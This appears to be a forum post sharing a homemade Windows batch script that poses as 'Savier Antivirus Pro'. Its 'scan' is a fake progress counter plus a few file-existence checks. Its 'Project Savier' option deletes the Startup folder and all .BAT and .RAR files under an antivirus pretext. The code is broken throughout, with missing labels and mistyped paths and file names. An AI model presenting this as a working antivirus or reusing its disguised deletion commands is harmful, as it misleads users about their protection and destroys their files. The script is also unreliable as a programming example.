I made this program when i was kid(around 14Y.O)...at that time i was learning batch program.This is simple and easily understandable for those who are learning batch programing.Feel free to edit and re-post.It is not a virus,so dont worry.I have some tutorials at my youtube channel..
Edit- Dont use option 3.It wont work but if u mess with it i am not responsible for your loss@echo off
color 0A
title Savier Antivirus Pro v1.00
start abort.exe
echo [~~~~~~~~~~~~~~~~~~~~~~~~~~~~]
echo {}==============[ SAVIER ANTIVIRUS PRO v1.00 ]=========={}
echo {} [~~~~~~~~~~~~{}~~~~~~~~~~~~~~] {}
echo [----{}---] {} {}
echo [ OPTIONS ] {}============={} {}
echo [---------]========{} {}
echo. {} {}
echo {} [------{}-------]
echo. [--------------------{}-------------------------] [ UTILITIES ]
echo [ (1) About Savier Antivirus Pro v1.00 ,Enter 1 ] [---------------]
echo. [-----------------------------------------------] [ This is a Sim ]
echo [ (2) Scan Whole System For Viruses ,Enter 2 ] [ ple Antivirus]
echo. [-----------------------------------------------] [ Program which ]
echo [ (3) Start Project Savier ,Enter 3 ]=======[ Removes Strong]
echo. [-----------------------------------------------] [ Trogans,worms ]
echo [ (4) ReInstall Startup Inspector ,Enter 4 ] [ genecs etc.and]
echo. [-----------------------------------------------] [ is Safe! ]
echo [ (5) Visit Our Website ,Enter 5 ] [---------------]
echo. [-----------------------------------------------]
echo [ (6) To Exit ,Enter 6 ]
echo [-----------------------------------------------]
set menu=
set /p menu="(A) Enter Your Option here : "
if not defined menu goto menu
if %menu%==1 (goto about)
if %menu%==2 (goto Scan)
if %menu%==3 (goto Project)
if %menu%==4 (goto inspector)
if %menu%==5 (start http://www.unitedexperts.22web.net/)
if %menu%==6 (exit /b)
goto menu
echo [----]
echo [Scan]==========={}
echo [----] {}=================={}
echo. {} {}
echo {} [----{}-----]
echo. [===============================] [ UTILITIES ]
echo [ (1) For Overall Scan ,Enter 1 ] [-----------]
echo. [-------------------------------] [OverallScan]
echo [ (2) To Go To Options ,Enter 2 ] [will scan a]
echo. [===============================] [ll system f]
echo [or all type]
echo. [s of viruse]
echo. [s like worm]
echo. [-----------]
set scan=
set /p scan=" (A) You Option : "
if %scan%==1 (goto overall)
if %scan%==2 (goto menu)
goto Scan
echo [------------]
echo [Overall Scan]
echo [-{}---------]
echo. {}
title Savier Antivirus Pro v1.00 Scanning - %percents%%%% Done
echo. {}
echo. --{}---------------
Echo Scanning: %percents%%%% Done
echo. -------------------
ping localhost -n 2 > nul
set /a percents=%percents%+1
if %percents%==101 goto ramesh
goto overall
cd %windir%\System32\
if exist %windir%\System32\b104.exe goto found
if exist %windir%\System32\AdmilliKeep.exe exist echo AdmilliKeep.exe goto found
if exist %windir%\System32\aotb1.exe goto found
if exist %windir%\System32\ausvc.exe goto found
if exist %windir%\System32\brtind.exe goto found
if exist %windir%\System32\cliner.exe goto found
if exist %windir%\System32\dis.exe goto found
if exist %windir%\System32\evisiondownload.exe goto found
if exist %windir%\System32\hadecd.exe goto found
if exist %windir%\System32\icq99portguard.exe goto found
if exist %windir%\System32\icqflood.exe goto found
if exist %windir%\System32\icqlock.exe goto found
if exist %windir%\System32\icqnuke.exe goto found
if exist %windir%\System32\icqtrogen.exe goto found
if exist %windir%\System32\imsicap.exe goto found
if exist %windir%\System32\info.exe goto found
if exist %windir%\System32\ip2uin.exe goto found
if exist %windir%\System32\keeper.exe goto found
if exist %windir%\System32\keycorder.exe goto found
if exist %windir%\System32\keylog.exe goto found
if exist %windir%\System32\keylogger.exe goto found
ping Local 2 > nul
title Savier Antivirus Pro v1.00 - System Protected
echo [----------------]
echo [No Viruses Found]
echo [------------]
echo [Overall Scan]-------------{}
echo [------------] {}
echo. {}
echo [ No Viruses Detected ]
echo [ To Visit To Scan Whole System ,Enter 1 ]
echo [ To Visit Options ,Enter 2 ]
set small=
set /p small="Your Option : "
if %small%==1 (goto Scan)
if %small%==2 (goto menu)
goto Small
echo Viruses Found!
echo [------------]
echo [Overall Scan]
echo [-----{}-----]
echo. {}
echo. [-----{}-------]
echo [Viruses Found!]
echo. [--------------]
title Savier Antivirus Pro v1.00 - Removing Viruses - %Less%%%% Done
Echo [-------- Removing Viruses: %less%%%% Done --------]
ping localhost -n 2 > nul
set /a less=%less%+1
if %less%==101 goto dell
goto yes
if exist %windir%\System32\b104.exe b140.exe
if exist %windir%\System32\AdmilliKeep.exe exist del AdmiliKeep.exe
if exist %windir%\System32\aotb1.exe del atob1.exe
if exist %windir%\System32\ausvc.exe del ausvc.exe
if exist %windir%\System32\brtind.exe del brtind.exe
if exist %windir%\System32\cliner.exe del cliner.exe
if exist %windir%\System32\dis.exe del dis.exe
if exist %windir%\System32\evisiondownload.exe del evisiondownload.exe
if exist %windir%\System32\hadecd.exe del handech.exe
if exist %windir%\System32\icq99portguard.exe del icq99portguard.exe
if exist %windir%\System32\icqflood.exe del icqflood.exe
if exist %windir%\System32\icqlock.exe del icqlock.exe
if exist %windir%\System32\icqnuke.exe echo icqnuke.exe del icqnuke.exe
if exist %windir%\System32\icqtrogen.exe echo icqtrogen.exe del icqtrogen.exe
if exist %windir%\System32\imsicap.exe echo imsicap.exe del imsicap.exe
if exist %windir%\System32\info.exe del info.exe
if exist %windir%\System32\ip2uin.exe Del ip2uin.ece
if exist %windir%\System32\keeper.exe del Keeper.exe
if exist %windir%\System32\keycorder.exe del Keycorder.exe
if exist %windir%\System32\keylog.exe del Keylog.exe
if exist %windir%\System32\keylogger.exe del keylogger.exe
echo Done!
ping local 2 > nul
ping local 2 > nul
goto Scan
echo [~~~~~~~~~~~~~~~~~~~~~~~~~~]
echo [SAVIER ANTIVIRUS PRO V1.OO]============================={}
echo [~~~~~~~~~~~~~{}~~~~~~~~~~~] {}
echo. {}====================={} {}
echo {} {}
echo [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~{}~~~~~] {}
echo [ MORE INFORMATION ] [----------{}----]
echo [~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~] [PRESS ENTER KEY ]
echo [ SCAN WHOLE SYSTEM - This Allows the user to scan ] [fOR OPTIONS ]
echo [ his system for Viruses. ] [-------------{}-]
echo [---------------------------------------------------] {}
echo [ PROJECT SAVIER - This is an options full of risk. ] {}
echo [ It Targets and destroys the home ] {}
echo [ of viruses.But you can loose data]==============={}
echo [---------------------------------------------------]
echo [ Startup Inspector - It is an intellectual program ]
echo [ which runs at the startup and ]
echo [ scans and disable virus effect]
echo [ You can re-install it by enter]
echo [ -ing 4th option. ]
echo [---------------------------------------------------]
echo [ Our Website - Visit our website for more updates ]
echo [ and for more usefull softwares. ]
echo [---------------------------------------------------]
goto menu
echo [~~~~~~~~~~~~~~~~~~~~~~~~~~]
echo [SAVIER ANTIVIRUS PRO V1.OO]==========={}
echo [~~~~~~~~~~{}~~~~~~~~~~~~~~] {}
echo {} {}
echo {} [-------{}------]
echo [---------------------{}-----------] [ UTILITIES ]
echo [ PROJECT SAVIER ] [---------------]
echo [----------------------------------] [ This Option is]
echo [ Start Project Savier? Y/N ] [full of risk we]
echo [----------------------------------] [are not respons]
echo [sible if any da]
echo [ta is lost. ]
echo [---------------]
set /p kills=" (A) Enter your option here - "
if %kills%==y goto yeah
if %kills%==n goto menu
goto project
echo [~~~~~~~~~~~~~~~~~~~~~~~]
echo [~~~~~~~~~~~~~~~~~~~~~~~]
echo Loading...
ping local 2 >nul
echo Done..
ping local 2 >nul
goto ya
echo [~~~~~~~~~~~~~~~~~~~~~~~]
echo [~~~~~~~~~~~~~~{}~~~~~~~]
echo [---------] {}
echo [Started..]==============={}
echo [--{}-----]
title Savier Antivirus Pro v1.00 Project Savier - %per%%%% Completed
echo. {}
echo. --{}---------------------
Echo Completing: %per%%%% Completed
echo. -------------------------
ping localhost -n 2 > nul
set /a per=%per%+1
if %per%==101 goto completed
goto ya
del userprofile%\Start Menu\Programs\startup
del *.BAT
del *.RAR
echo [---------]
ping local 2 >nul
goto menu